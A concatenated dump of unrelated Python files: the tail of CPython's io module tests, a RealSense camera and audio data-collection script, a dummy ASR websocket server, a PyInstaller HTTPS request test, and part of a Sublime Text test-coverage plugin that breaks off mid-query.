encodings = ( # None meaning the IncrementalNewlineDecoder takes unicode input # rather than bytes input None, 'utf-8', 'latin-1', 'utf-16', 'utf-16-le', 'utf-16-be', 'utf-32', 'utf-32-le', 'utf-32-be', ) for enc in encodings: decoder = enc and codecs.getincrementaldecoder(enc)() decoder = self.IncrementalNewlineDecoder(decoder, translate=True) self.check_newline_decoding(decoder, enc) decoder = codecs.getincrementaldecoder("utf-8")() decoder = self.IncrementalNewlineDecoder(decoder, translate=True) self.check_newline_decoding_utf8(decoder) self.assertRaises(TypeError, decoder.setstate, 42) def test_newline_bytes(self): # Issue 5433: Excessive optimization in IncrementalNewlineDecoder def _check(dec): self.assertEqual(dec.newlines, None) self.assertEqual(dec.decode("\u0D00"), "\u0D00") self.assertEqual(dec.newlines, None) self.assertEqual(dec.decode("\u0A00"), "\u0A00") self.assertEqual(dec.newlines, None) dec = self.IncrementalNewlineDecoder(None, translate=False) _check(dec) dec = self.IncrementalNewlineDecoder(None, translate=True) _check(dec) def test_translate(self): # issue 35062 for translate in (-2, -1, 1, 2): decoder = codecs.getincrementaldecoder("utf-8")() decoder = self.IncrementalNewlineDecoder(decoder, translate) self.check_newline_decoding_utf8(decoder) decoder = codecs.getincrementaldecoder("utf-8")() decoder = self.IncrementalNewlineDecoder(decoder, translate=0) self.assertEqual(decoder.decode(b"\r\r\n"), "\r\r\n") class CIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest): pass class PyIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest): pass # XXX Tests for open() class MiscIOTest(unittest.TestCase): def tearDown(self): support.unlink(support.TESTFN) def test___all__(self): for name in self.io.__all__: obj = getattr(self.io, name, None) self.assertIsNotNone(obj, name) if name in ("open", "open_code"): continue elif "error" in name.lower() or name == "UnsupportedOperation": self.assertTrue(issubclass(obj, Exception), name) elif not name.startswith("SEEK_"): self.assertTrue(issubclass(obj, self.IOBase)) def test_attributes(self): f = self.open(support.TESTFN, "wb", buffering=0) self.assertEqual(f.mode, "wb") f.close() with support.check_warnings(('', DeprecationWarning)): f = self.open(support.TESTFN, "U") self.assertEqual(f.name, support.TESTFN) self.assertEqual(f.buffer.name, support.TESTFN) self.assertEqual(f.buffer.raw.name, support.TESTFN) self.assertEqual(f.mode, "U") self.assertEqual(f.buffer.mode, "rb") self.assertEqual(f.buffer.raw.mode, "rb") f.close() f = self.open(support.TESTFN, "w+") self.assertEqual(f.mode, "w+") self.assertEqual(f.buffer.mode, "rb+") # Does it really matter? self.assertEqual(f.buffer.raw.mode, "rb+") g = self.open(f.fileno(), "wb", closefd=False) self.assertEqual(g.mode, "wb") self.assertEqual(g.raw.mode, "wb") self.assertEqual(g.name, f.fileno()) self.assertEqual(g.raw.name, f.fileno()) f.close() g.close() def test_open_pipe_with_append(self): # bpo-27805: Ignore ESPIPE from lseek() in open(). r, w = os.pipe() self.addCleanup(os.close, r) f = self.open(w, 'a') self.addCleanup(f.close) # Check that the file is marked non-seekable. On Windows, however, lseek # somehow succeeds on pipes. if sys.platform != 'win32': self.assertFalse(f.seekable()) def test_io_after_close(self): for kwargs in [ {"mode": "w"}, {"mode": "wb"}, {"mode": "w", "buffering": 1}, {"mode": "w", "buffering": 2}, {"mode": "wb", "buffering": 0}, {"mode": "r"}, {"mode": "rb"}, {"mode": "r", "buffering": 1}, {"mode": "r", "buffering": 2}, {"mode": "rb", "buffering": 0}, {"mode": "w+"}, {"mode": "w+b"}, {"mode": "w+", "buffering": 1}, {"mode": "w+", "buffering": 2}, {"mode": "w+b", "buffering": 0}, ]: f = self.open(support.TESTFN, **kwargs) f.close() self.assertRaises(ValueError, f.flush) self.assertRaises(ValueError, f.fileno) self.assertRaises(ValueError, f.isatty) self.assertRaises(ValueError, f.__iter__) if hasattr(f, "peek"): self.assertRaises(ValueError, f.peek, 1) self.assertRaises(ValueError, f.read) if hasattr(f, "read1"): self.assertRaises(ValueError, f.read1, 1024) self.assertRaises(ValueError, f.read1) if hasattr(f, "readall"): self.assertRaises(ValueError, f.readall) if hasattr(f, "readinto"): self.assertRaises(ValueError, f.readinto, bytearray(1024)) if hasattr(f, "readinto1"): self.assertRaises(ValueError, f.readinto1, bytearray(1024)) self.assertRaises(ValueError, f.readline) self.assertRaises(ValueError, f.readlines) self.assertRaises(ValueError, f.readlines, 1) self.assertRaises(ValueError, f.seek, 0) self.assertRaises(ValueError, f.tell) self.assertRaises(ValueError, f.truncate) self.assertRaises(ValueError, f.write, b"" if "b" in kwargs['mode'] else "") self.assertRaises(ValueError, f.writelines, []) self.assertRaises(ValueError, next, f) def test_blockingioerror(self): # Various BlockingIOError issues class C(str): pass c = C("") b = self.BlockingIOError(1, c) c.b = b b.c = c wr = weakref.ref(c) del c, b support.gc_collect() self.assertIsNone(wr(), wr) def test_abcs(self): # Test the visible base classes are ABCs. self.assertIsInstance(self.IOBase, abc.ABCMeta) self.assertIsInstance(self.RawIOBase, abc.ABCMeta) self.assertIsInstance(self.BufferedIOBase, abc.ABCMeta) self.assertIsInstance(self.TextIOBase, abc.ABCMeta) def _check_abc_inheritance(self, abcmodule): with self.open(support.TESTFN, "wb", buffering=0) as f: self.assertIsInstance(f, abcmodule.IOBase) self.assertIsInstance(f, abcmodule.RawIOBase) self.assertNotIsInstance(f, abcmodule.BufferedIOBase) self.assertNotIsInstance(f, abcmodule.TextIOBase) with self.open(support.TESTFN, "wb") as f: self.assertIsInstance(f, abcmodule.IOBase) self.assertNotIsInstance(f, abcmodule.RawIOBase) self.assertIsInstance(f, abcmodule.BufferedIOBase) self.assertNotIsInstance(f, abcmodule.TextIOBase) with self.open(support.TESTFN, "w") as f: self.assertIsInstance(f, abcmodule.IOBase) self.assertNotIsInstance(f, abcmodule.RawIOBase) self.assertNotIsInstance(f, abcmodule.BufferedIOBase) self.assertIsInstance(f, abcmodule.TextIOBase) def test_abc_inheritance(self): # Test implementations inherit from their respective ABCs self._check_abc_inheritance(self) def test_abc_inheritance_official(self): # Test implementations inherit from the official ABCs of the # baseline "io" module. self._check_abc_inheritance(io) def _check_warn_on_dealloc(self, *args, **kwargs): f = open(*args, **kwargs) r = repr(f) with self.assertWarns(ResourceWarning) as cm: f = None support.gc_collect() self.assertIn(r, str(cm.warning.args[0])) def test_warn_on_dealloc(self): self._check_warn_on_dealloc(support.TESTFN, "wb", buffering=0) self._check_warn_on_dealloc(support.TESTFN, "wb") self._check_warn_on_dealloc(support.TESTFN, "w") def _check_warn_on_dealloc_fd(self, *args, **kwargs): fds = [] def cleanup_fds(): for fd in fds: try: os.close(fd) except OSError as e: if e.errno != errno.EBADF: raise self.addCleanup(cleanup_fds) r, w = os.pipe() fds += r, w self._check_warn_on_dealloc(r, *args, **kwargs) # When using closefd=False, there's no warning r, w = os.pipe() fds += r, w with support.check_no_resource_warning(self): open(r, *args, closefd=False, **kwargs) def test_warn_on_dealloc_fd(self): self._check_warn_on_dealloc_fd("rb", buffering=0) self._check_warn_on_dealloc_fd("rb") self._check_warn_on_dealloc_fd("r") def test_pickling(self): # Pickling file objects is forbidden for kwargs in [ {"mode": "w"}, {"mode": "wb"}, {"mode": "wb", "buffering": 0}, {"mode": "r"}, {"mode": "rb"}, {"mode": "rb", "buffering": 0}, {"mode": "w+"}, {"mode": "w+b"}, {"mode": "w+b", "buffering": 0}, ]: for protocol in range(pickle.HIGHEST_PROTOCOL + 1): with self.open(support.TESTFN, **kwargs) as f: self.assertRaises(TypeError, pickle.dumps, f, protocol) def test_nonblock_pipe_write_bigbuf(self): self._test_nonblock_pipe_write(16*1024) def test_nonblock_pipe_write_smallbuf(self): self._test_nonblock_pipe_write(1024) @unittest.skipUnless(hasattr(os, 'set_blocking'), 'os.set_blocking() required for this test') def _test_nonblock_pipe_write(self, bufsize): sent = [] received = [] r, w = os.pipe() os.set_blocking(r, False) os.set_blocking(w, False) # To exercise all code paths in the C implementation we need # to play with buffer sizes. For instance, if we choose a # buffer size less than or equal to _PIPE_BUF (4096 on Linux) # then we will never get a partial write of the buffer. rf = self.open(r, mode='rb', closefd=True, buffering=bufsize) wf = self.open(w, mode='wb', closefd=True, buffering=bufsize) with rf, wf: for N in 9999, 73, 7574: try: i = 0 while True: msg = bytes([i % 26 + 97]) * N sent.append(msg) wf.write(msg) i += 1 except self.BlockingIOError as e: self.assertEqual(e.args[0], errno.EAGAIN) self.assertEqual(e.args[2], e.characters_written) sent[-1] = sent[-1][:e.characters_written] received.append(rf.read()) msg = b'BLOCKED' wf.write(msg) sent.append(msg) while True: try: wf.flush() break except self.BlockingIOError as e: self.assertEqual(e.args[0], errno.EAGAIN) self.assertEqual(e.args[2], e.characters_written) self.assertEqual(e.characters_written, 0) received.append(rf.read()) received += iter(rf.read, None) sent, received = b''.join(sent), b''.join(received) self.assertEqual(sent, received) self.assertTrue(wf.closed) self.assertTrue(rf.closed) def test_create_fail(self): # 'x' mode fails if file is existing with self.open(support.TESTFN, 'w'): pass self.assertRaises(FileExistsError, self.open, support.TESTFN, 'x') def test_create_writes(self): # 'x' mode opens for writing with self.open(support.TESTFN, 'xb') as f: f.write(b"spam") with self.open(support.TESTFN, 'rb') as f: self.assertEqual(b"spam", f.read()) def test_open_allargs(self): # there used to be a buffer overflow in the parser for rawmode self.assertRaises(ValueError, self.open, support.TESTFN, 'rwax+') def test_check_encoding_errors(self): # bpo-37388: open() and TextIOWrapper must check encoding and errors # arguments in dev mode mod = self.io.__name__ filename = __file__ invalid = 'Boom, Shaka Laka, Boom!' code = textwrap.dedent(f''' import sys from {mod} import open, TextIOWrapper try: open({filename!r}, encoding={invalid!r}) except LookupError: pass else: sys.exit(21) try: open({filename!r}, errors={invalid!r}) except LookupError: pass else: sys.exit(22) fp = open({filename!r}, "rb") with fp: try: TextIOWrapper(fp, encoding={invalid!r}) except LookupError: pass else: sys.exit(23) try: TextIOWrapper(fp, errors={invalid!r}) except LookupError: pass else: sys.exit(24) sys.exit(10) ''') proc = assert_python_failure('-X', 'dev', '-c', code) self.assertEqual(proc.rc, 10, proc) class CMiscIOTest(MiscIOTest): io = io def test_readinto_buffer_overflow(self): # Issue #18025 class BadReader(self.io.BufferedIOBase): def read(self, n=-1): return b'x' * 10**6 bufio = BadReader() b = bytearray(2) self.assertRaises(ValueError, bufio.readinto, b) def check_daemon_threads_shutdown_deadlock(self, stream_name): # Issue #23309: deadlocks at shutdown should be avoided when a # daemon thread and the main thread both write to a file. code = """if 1: import sys import time import threading from test.support import SuppressCrashReport file = sys.{stream_name} def run(): while True: file.write('.') file.flush() crash = SuppressCrashReport() crash.__enter__() # don't call __exit__(): the crash occurs at Python shutdown thread = threading.Thread(target=run) thread.daemon = True thread.start() time.sleep(0.5) file.write('!') file.flush() """.format_map(locals()) res, _ = run_python_until_end("-c", code) err = res.err.decode() if res.rc != 0: # Failure: should be a fatal error pattern = (r"Fatal Python error: _enter_buffered_busy: " r"could not acquire lock " r"for <(_io\.)?BufferedWriter name='<{stream_name}>'> " r"at interpreter shutdown, possibly due to " r"daemon threads".format_map(locals())) self.assertRegex(err, pattern) else: self.assertFalse(err.strip('.!')) def test_daemon_threads_shutdown_stdout_deadlock(self): self.check_daemon_threads_shutdown_deadlock('stdout') def test_daemon_threads_shutdown_stderr_deadlock(self): self.check_daemon_threads_shutdown_deadlock('stderr') class PyMiscIOTest(MiscIOTest): io = pyio @unittest.skipIf(os.name == 'nt', 'POSIX signals required for this test.') class SignalsTest(unittest.TestCase): def setUp(self): self.oldalrm = signal.signal(signal.SIGALRM, self.alarm_interrupt) def tearDown(self): signal.signal(signal.SIGALRM, self.oldalrm) def alarm_interrupt(self, sig, frame): 1/0 def check_interrupted_write(self, item, bytes, **fdopen_kwargs): """Check that a partial write, when it gets interrupted, properly invokes the signal handler, and bubbles up the exception raised in the latter.""" read_results = [] def _read(): s = os.read(r, 1) read_results.append(s) t = threading.Thread(target=_read) t.daemon = True r, w = os.pipe() fdopen_kwargs["closefd"] = False large_data = item * (support.PIPE_MAX_SIZE // len(item) + 1) try: wio = self.io.open(w, **fdopen_kwargs) if hasattr(signal, 'pthread_sigmask'): # create the thread with SIGALRM signal blocked signal.pthread_sigmask(signal.SIG_BLOCK, [signal.SIGALRM]) t.start() signal.pthread_sigmask(signal.SIG_UNBLOCK, [signal.SIGALRM]) else: t.start() # Fill the pipe enough that the write will be blocking. # It will be interrupted by the timer armed above. Since the # other thread has read one byte, the low-level write will # return with a successful (partial) result rather than an EINTR. # The buffered IO layer must check for pending signal # handlers, which in this case will invoke alarm_interrupt(). signal.alarm(1) try: self.assertRaises(ZeroDivisionError, wio.write, large_data) finally: signal.alarm(0) t.join() # We got one byte, get another one and check that it isn't a # repeat of the first one. read_results.append(os.read(r, 1)) self.assertEqual(read_results, [bytes[0:1], bytes[1:2]]) finally: os.close(w) os.close(r) # This is deliberate. If we didn't close the file descriptor # before closing wio, wio would try to flush its internal # buffer, and block again. try: wio.close() except OSError as e: if e.errno != errno.EBADF: raise def test_interrupted_write_unbuffered(self): self.check_interrupted_write(b"xy", b"xy", mode="wb", buffering=0) def test_interrupted_write_buffered(self): self.check_interrupted_write(b"xy", b"xy", mode="wb") def test_interrupted_write_text(self): self.check_interrupted_write("xy", b"xy", mode="w", encoding="ascii") @support.no_tracing def check_reentrant_write(self, data, **fdopen_kwargs): def on_alarm(*args): # Will be called reentrantly from the same thread wio.write(data) 1/0 signal.signal(signal.SIGALRM, on_alarm) r, w = os.pipe() wio = self.io.open(w, **fdopen_kwargs) try: signal.alarm(1) # Either the reentrant call to wio.write() fails with RuntimeError, # or the signal handler raises ZeroDivisionError. with self.assertRaises((ZeroDivisionError, RuntimeError)) as cm: while 1: for i in range(100): wio.write(data) wio.flush() # Make sure the buffer doesn't fill up and block further writes os.read(r, len(data) * 100) exc = cm.exception if isinstance(exc, RuntimeError): self.assertTrue(str(exc).startswith("reentrant call"), str(exc)) finally: signal.alarm(0) wio.close() os.close(r) def test_reentrant_write_buffered(self): self.check_reentrant_write(b"xy", mode="wb") def test_reentrant_write_text(self): self.check_reentrant_write("xy", mode="w", encoding="ascii") def check_interrupted_read_retry(self, decode, **fdopen_kwargs): """Check that a buffered read, when it gets interrupted (either returning a partial result or EINTR), properly invokes the signal handler and retries if the latter returned successfully.""" r, w = os.pipe() fdopen_kwargs["closefd"] = False def alarm_handler(sig, frame): os.write(w, b"bar") signal.signal(signal.SIGALRM, alarm_handler) try: rio = self.io.open(r, **fdopen_kwargs) os.write(w, b"foo") signal.alarm(1) # Expected behaviour: # - first raw read() returns partial b"foo" # - second raw read() returns EINTR # - third raw read() returns b"bar" self.assertEqual(decode(rio.read(6)), "foobar") finally: signal.alarm(0) rio.close() os.close(w) os.close(r) def test_interrupted_read_retry_buffered(self): self.check_interrupted_read_retry(lambda x: x.decode('latin1'), mode="rb") def test_interrupted_read_retry_text(self): self.check_interrupted_read_retry(lambda x: x, mode="r") def check_interrupted_write_retry(self, item, **fdopen_kwargs): """Check that a buffered write, when it gets interrupted (either returning a partial result or EINTR), properly invokes the signal handler and retries if the latter returned successfully.""" select = support.import_module("select") # A quantity that exceeds the buffer size of an anonymous pipe's # write end. N = support.PIPE_MAX_SIZE r, w = os.pipe() fdopen_kwargs["closefd"] = False # We need a separate thread to read from the pipe and allow the # write() to finish. This thread is started after the SIGALRM is # received (forcing a first EINTR in write()). read_results = [] write_finished = False error = None def _read(): try: while not write_finished: while r in select.select([r], [], [], 1.0)[0]: s = os.read(r, 1024) read_results.append(s) except BaseException as exc: nonlocal error error = exc t = threading.Thread(target=_read) t.daemon = True def alarm1(sig, frame): signal.signal(signal.SIGALRM, alarm2) signal.alarm(1) def alarm2(sig, frame): t.start() large_data = item * N signal.signal(signal.SIGALRM, alarm1) try: wio = self.io.open(w, **fdopen_kwargs) signal.alarm(1) # Expected behaviour: # - first raw write() is partial (because of the limited pipe buffer # and the first alarm) # - second raw write() returns EINTR (because of the second alarm) # - subsequent write()s are successful (either partial or complete) written = wio.write(large_data) self.assertEqual(N, written) wio.flush() write_finished = True t.join() self.assertIsNone(error) self.assertEqual(N, sum(len(x) for x in read_results)) finally: signal.alarm(0) write_finished = True os.close(w) os.close(r) # This is deliberate. If we didn't close the file descriptor # before closing wio, wio would try to flush its internal # buffer, and could block (in case of failure). try: wio.close() except OSError as e: if e.errno != errno.EBADF: raise def test_interrupted_write_retry_buffered(self): self.check_interrupted_write_retry(b"x", mode="wb") def test_interrupted_write_retry_text(self): self.check_interrupted_write_retry("x", mode="w", encoding="latin1") class CSignalsTest(SignalsTest): io = io class PySignalsTest(SignalsTest): io = pyio # Handling reentrancy issues would slow down _pyio even more, so the # tests are disabled. test_reentrant_write_buffered = None test_reentrant_write_text = None def load_tests(*args): tests = (CIOTest, PyIOTest, APIMismatchTest, CBufferedReaderTest, PyBufferedReaderTest, CBufferedWriterTest, PyBufferedWriterTest, CBufferedRWPairTest, PyBufferedRWPairTest, CBufferedRandomTest, PyBufferedRandomTest, StatefulIncrementalDecoderTest, CIncrementalNewlineDecoderTest, PyIncrementalNewlineDecoderTest, CTextIOWrapperTest, PyTextIOWrapperTest, CMiscIOTest, PyMiscIOTest, CSignalsTest, PySignalsTest, ) # Put the namespaces of the IO module we are testing and some useful mock # classes in the __dict__ of each test. mocks = (MockRawIO, MisbehavedRawIO, MockFileIO, CloseFailureIO, MockNonBlockWriterIO, MockUnseekableIO, MockRawIOWithoutRead, SlowFlushRawIO) all_members = io.__all__ + ["IncrementalNewlineDecoder"] c_io_ns = {name : getattr(io, name) for name in all_members} py_io_ns = {name : getattr(pyio, name) for name in all_members} globs = globals() c_io_ns.update((x.__name__, globs["C" + x.__name__]) for x in mocks) py_io_ns.update((x.__name__, globs["Py" + x.__name__]) for x in mocks) # Avoid turning open into a bound method. py_io_ns["open"] = pyio.OpenWrapper for test in tests: if test.__name__.startswith("C"): for name, obj in c_io_ns.items(): setattr(test, name, obj) elif test.__name__.startswith("Py"): for name, obj in py_io_ns.items(): setattr(test, name, obj) suite = unittest.TestSuite([unittest.makeSuite(test) for test in tests]) return suite if __name__ == "__main__": unittest.main()
Data_Collection_2.py
import cv2 import imageio import pyrealsense2 as rs import os import shutil import datetime import pyaudio import http.client import io import numpy as np import json import zlib import base64 import datetime import threading import wave import pygame as pg import time class CollectData: def __init__(self): self.dct = {'a':0, 'b':0} def woofer(self): pg.mixer.init(frequency=44100, size=-16, channels=2, buffer=512) sound1 = pg.mixer.Sound('sub_woofer_3.wav') channel1 = sound1.play() channel1.set_volume(0.9, 0.0) def camera(self, fileprefix): pipeline = rs.pipeline() config = rs.config() config.enable_stream(rs.stream.depth, 640, 480, rs.format.z16, 30) config.enable_stream(rs.stream.color, 640, 480, rs.format.bgr8, 30) profile = pipeline.start(config) depth_sensor = profile.get_device().first_depth_sensor() depth_sensor.set_option(rs.option.visual_preset, 3) # Set high accuracy for depth sensor depth_scale = depth_sensor.get_depth_scale() clipping_distance_in_meters = 1 clipping_distance = clipping_distance_in_meters / depth_scale align_to = rs.stream.color align = rs.align(align_to) try: frames = pipeline.wait_for_frames() aligned_frames = align.process(frames) aligned_depth_frame = aligned_frames.get_depth_frame() color_frame = aligned_frames.get_color_frame() if not aligned_depth_frame or not color_frame: raise RuntimeError("Could not acquire depth or color frames.") depth_image = np.asanyarray(aligned_depth_frame.get_data()) color_image = np.asanyarray(color_frame.get_data()) grey_color = 153 depth_image_3d = np.dstack( (depth_image, depth_image, depth_image) ) # Depth image is 1 channel, color is 3 channels bg_removed = np.where( (depth_image_3d > clipping_distance) | (depth_image_3d <= 0), grey_color, color_image, ) color_image = color_image[..., ::-1] # depth_path = '../Sample_8/Images/Depth/%s.png' % fileprefix rgb_path = '../Sample_9/Images/%s.png' % fileprefix # imageio.imwrite(depth_path, depth_image) imageio.imwrite(rgb_path, color_image) finally: pipeline.stop() #return color_image, depth_image def emitsound(self): time.sleep(1) pg.mixer.init(frequency=44100, size=-16, channels=2, buffer=512) sound0 = pg.mixer.Sound('emit_sound_single_frequency.wav') channel0 = sound0.play() channel0.set_volume(0.0, 1.0) self.dct['a'] = datetime.datetime.now() # print("Emit Sound is running at : ", datetime.datetime.now()) def recording(self,fileprefix): # print("Recording function is running at ", datetime.datetime.now()) # The server file will be running on respeaker which should be pinged from here # and return us the audio ouput of 6 arrays. Modifiy the client and server file BODY = "***filecontents***" conn = http.client.HTTPConnection('172.31.37.131', 8882) conn.request("GET", "/file") response = conn.getresponse() print(response.status, response.reason) data = response.read() data2 = base64.b64decode(data) data2 = zlib.decompress(data2) fdata = np.frombuffer(data2, dtype=np.int16) with open('../Sample_9/Recording/%s.npy' % fileprefix, 'wb') as f: np.save(f, fdata) self.dct['b'] = datetime.datetime.now() def simul_thread(self, fileprefix): thread_lst = [] t0 = threading.Thread(target=self.recording, args=(fileprefix,)) thread_lst.append(t0) t0.start() t1 = threading.Thread(target=self.emitsound) thread_lst.append(t1) t1.start() for thread in thread_lst: thread.join()
server.py
import json import logging import os import random import string import threading import time from datetime import datetime from logging.handlers import TimedRotatingFileHandler import click import tornado.ioloop import tornado.websocket os.makedirs('./logs', exist_ok=True) logging.basicConfig(format='%(asctime)s %(module)s %(levelname)s : %(message)s', level=logging.INFO, handlers=[ TimedRotatingFileHandler("logs/log.txt", when='D', backupCount=30), logging.StreamHandler() ]) sockets = [] _socket_index = 0 def get_sock_index(): global _socket_index sock_index = _socket_index _socket_index = _socket_index + 1 return sock_index class EchoWebSocket(tornado.websocket.WebSocketHandler): def open(self): logging.info("WebSocket opened") def on_message(self, message): logging.info("on_message: message length %s" % len(message)) utc_now = datetime.utcnow().isoformat() logging.info("Sending %s ..." % utc_now) self.write_message(utc_now) def on_close(self): logging.info("WebSocket closed") class DummyASRWebSocket(tornado.websocket.WebSocketHandler): SLEEP_INTERVAL = 3 PARTIAL_INTERVAL = 3 def __init__(self, application, request, **kwargs): super().__init__(application, request, **kwargs) self.start_transmission = False self.utt_id = 0 self.transmission_thread = threading.Thread(target=self._run) def open(self): sockets.append(self) self.sock_index = get_sock_index() logging.info("[Sock %s] DummyASRWebSocket opened" % self.sock_index) def on_message(self, message): if isinstance(message, str): logging.info("[Sock %s] Message received: %s" % (self.sock_index, message)) else: logging.info("[Sock %s] Message received" % (self.sock_index, )) # following protocol of ASR engine # 1 byte value of '0' indicates start of stream # 1 byte value of '1' indicates end of stream if isinstance(message, bytes) and len(message) == 1: if message[0] == 0: logging.info('[Sock %s] Start stream' % self.sock_index) self.start_transmission = True if message[0] == 1: logging.info('[Sock %s] Ending stream' % self.sock_index) self.close() # self.close does not call on_close callback self.on_close() elif self.start_transmission and not self.transmission_thread.is_alive(): self.transmission_thread = threading.Thread(target=self._run) self.transmission_thread.start() def on_close(self): sockets.remove(self) logging.info("[Sock %s] Removed sock %s from socket list" % (self.sock_index, self.sock_index)) logging.info("[Sock %s] DummyASRWebSocket closed" % self.sock_index) def _run(self): logging.info("[Sock %s] Starting transmission for utt_id %s" % (self.sock_index, self.utt_id)) for i in range(self.PARTIAL_INTERVAL): response = {} response['uttID'] = self.utt_id # return random combination of strings and digits # https://stackoverflow.com/questions/2257441/random-string-generation-with-upper-case-letters-and-digits random_str = ''.join(random.choices(string.ascii_uppercase + string.digits, k=3)) response['result'] = f"{self.utt_id}_{i}_{random_str}" if i == self.PARTIAL_INTERVAL - 1: response['cmd'] = 'asrfull' self.utt_id = self.utt_id + 1 else: response['cmd'] = 'asrpartial' try: self.write_message(response) logging.info("[Sock %s] Sent result: %s" % (self.sock_index, response)) time.sleep(self.SLEEP_INTERVAL) except tornado.websocket.WebSocketClosedError as e: logging.error( "[Sock %s] Websocket already closed." % self.sock_index) def make_app(): return tornado.web.Application([ (r"/", DummyASRWebSocket), (r"/echo", EchoWebSocket) ]) @click.command() @click.option('--port', '-p', default=5000) def main(port: int): # reference: https://gist.github.com/timsavage/d412d9e321e9f6d358abb335c8d41c63 app = make_app() app.listen(port) logging.info("Starting websocket server on port %s" % port) tornado.ioloop.IOLoop.current().start() if __name__ == "__main__": main()
pyi_lib_requests.py
# ----------------------------------------------------------------------------- # Copyright (c) 2014-2021, PyInstaller Development Team. # # Distributed under the terms of the GNU General Public License (version 2 # or later) with exception for distributing the bootloader. # # The full license is in the file COPYING.txt, distributed with this software. # # SPDX-License-Identifier: (GPL-2.0-or-later WITH Bootloader-exception) # ----------------------------------------------------------------------------- import socket try: import BaseHTTPServer import SimpleHTTPServer except ImportError: import http.server as BaseHTTPServer import http.server as SimpleHTTPServer import os import ssl import sys import threading import time import requests """ Note: to re-create the server.pem file use the following commands: cd /path/to/pyinstaller.git/tests/functional openssl req -new -x509 -keyout data/requests/server.pem \ -text -out data/requests/server.pem -days 36500 \ -nodes -config data/requests/openssl.conf """ if getattr(sys, 'frozen', False): # We are running in a |PyInstaller| bundle. basedir = sys._MEIPASS else: # We are running in a normal Python environment. basedir = os.path.dirname(__file__) SERVER_CERT = os.path.join(basedir, "server.pem") if not os.path.exists(SERVER_CERT): raise SystemExit('Certificate-File %s is missing' % SERVER_CERT) def main(): SERVER_PORT = 8443 httpd = None # Since unit tests run in parallel, the port may be in use, so retry creating the server while incrementing # the port number. while SERVER_PORT < 8493: # Max 50 retries try: # SSL server copied from here: http://www.piware.de/2011/01/creating-an-https-server-in-python/ httpd = BaseHTTPServer.HTTPServer(('localhost', SERVER_PORT), SimpleHTTPServer.SimpleHTTPRequestHandler) except socket.error as e: if e.errno == 98: # Address in use SERVER_PORT += 1 continue else: # Some other socket.error raise else: # Success break else: # Did not break from loop, so we ran out of retries assert False, "Could not bind server port: all ports in use." httpd.socket = ssl.wrap_socket(httpd.socket, certfile=SERVER_CERT, server_side=True) def ssl_server(): httpd.serve_forever() # Start the SSL server thread = threading.Thread(target=ssl_server) thread.daemon = True thread.start() # Wait a bit for the server to start time.sleep(1) # Use requests to get a page from the server requests.get("https://localhost:{}".format(SERVER_PORT), verify=SERVER_CERT) # requests.get("https://github.com") if __name__ == '__main__': main()
package_coverage.py
# coding: utf-8 from __future__ import unicode_literals, division, absolute_import, print_function import sys import os import re import threading import imp import time import unittest import sublime import sublime_plugin import coverage import coverage.files import shellenv import sqlite3 import subprocess import webbrowser import shutil import inspect from datetime import datetime from textwrap import dedent if sys.platform == 'win32': from ctypes import windll, create_unicode_buffer if sys.version_info >= (3,): from io import StringIO from imp import reload else: from cStringIO import StringIO __version__ = '1.1.1' __version_info__ = (1, 1, 1) class PackageCoverageExecCommand(sublime_plugin.WindowCommand): """ Runs the tests for a package and displays the output in an output panel """ def run(self, do_coverage=False, ui_thread=False, html_report=False, by_name=False): testable_packages = find_testable_packages() if not testable_packages: sublime.error_message(format_message(''' Package Coverage No testable packages could be found ''')) return settings = sublime.load_settings('Package Coverage.sublime-settings') self.coverage_database = get_setting(self.window, settings, 'coverage_database') self.do_coverage = do_coverage self.ui_thread = ui_thread self.html_report = html_report self.packages = testable_packages self.by_name = by_name self.name_pattern = None self.window.show_quick_panel(testable_packages, self.on_done) def on_done(self, index): """ User input handler for selecting the package to run the tests for :param index: An integer - will be -1 if user cancelled selection, otherwise will be the index of the package name in the self.packages list """ if index == -1: return self.package_name = self.packages[index] if not self.by_name: return self.run_tests() self.prompt_name_pattern() def prompt_name_pattern(self, initial=''): def handle_pattern(pattern): try: self.name_pattern = re.compile(pattern) self.run_tests() except (re.error): sublime.error_message(format_message(''' Package Coverage The pattern entered could not be compiled as a regular expression ''')) self.prompt_name_pattern(pattern) self.window.show_input_panel( 'Name Regex', initial, handle_pattern, None, None ) def run_tests(self): package_name = self.package_name package_dir = os.path.join(sublime.packages_path(), package_name) db_results_file = None if self.do_coverage: include_dir = os.path.join(package_dir, '*.py') omit_dir = os.path.join(package_dir, 'dev', '*.py') if sys.platform == 'win32': short_include_dir = create_short_path(os.path.dirname(include_dir)) if short_include_dir: include_dir = [include_dir, os.path.join(short_include_dir, '*.py')] short_omit_dir = create_short_path(os.path.dirname(omit_dir)) if short_omit_dir: omit_dir = [omit_dir, os.path.join(short_omit_dir, '*.py')] # Depending on the folder launched from with ST2 on Linux, the current # folder seems to have a big impact on how coverage selects code to # measure, and can even lead to measuring stdlib code, but then producing # errors when it can not find the source to said stdlib files. To work # around this, we explicitly enumerate every .py file in the package and # pass then all via include_dir. elif sys.platform not in set(['win32', 'darwin']) and sys.version_info < (3,): include_dir = [] for root, dir_names, file_names in os.walk(package_dir): for file_name in file_names: if not file_name.endswith('.py'): continue include_dir.append(os.path.join(root, file_name)) cov = coverage.Coverage(include=include_dir, omit=omit_dir) cov.start() db_results_file = StringIO() title = 'Measuring %s Coverage' % package_name else: title = 'Running %s Tests' % package_name tests_module, panel = create_resources(self.window, package_name, package_dir) panel_queue = StringQueue() def show_output_panel(): self.window.run_command('show_panel', {'panel': 'output.%s_tests' % package_name}) show_output_panel() # Variables shared between the two threads. There is no locking here # since the two threads strictly run one after the other. Would use # nonlocal here if we didn't have to support Python 2.6. thread_vars = { 'all_short': None, 'short_package_dir': None, 'cov_data': None } def done_displaying_results(): sublime.set_timeout(show_output_panel, 10) if self.do_coverage and self.coverage_database: try: is_clean = is_git_clean(package_dir) except (OSError) as e: print(format_message(''' Package Coverage: not saving results to coverage database since an error occurred fetching the git status: %s ''', e.args[0])) return if not is_clean: print(format_message(''' Package Coverage: not saving results to coverage database since git repository has modified files ''')) return commit_hash, commit_date, summary = git_commit_info(package_dir) data_file = StringIO() thread_vars['cov_data'].write_fileobj(data_file) data_bytes = data_file.getvalue() platform = { 'win32': 'windows', 'darwin': 'osx' }.get(sys.platform, 'linux') python_version = '%s.%s' % sys.version_info[0:2] if thread_vars['all_short']: path_prefix = thread_vars['short_package_dir'] + os.sep else: path_prefix = package_dir + os.sep output = db_results_file.getvalue() connection = open_database(self.coverage_database) cursor = connection.cursor() cursor.execute(""" INSERT 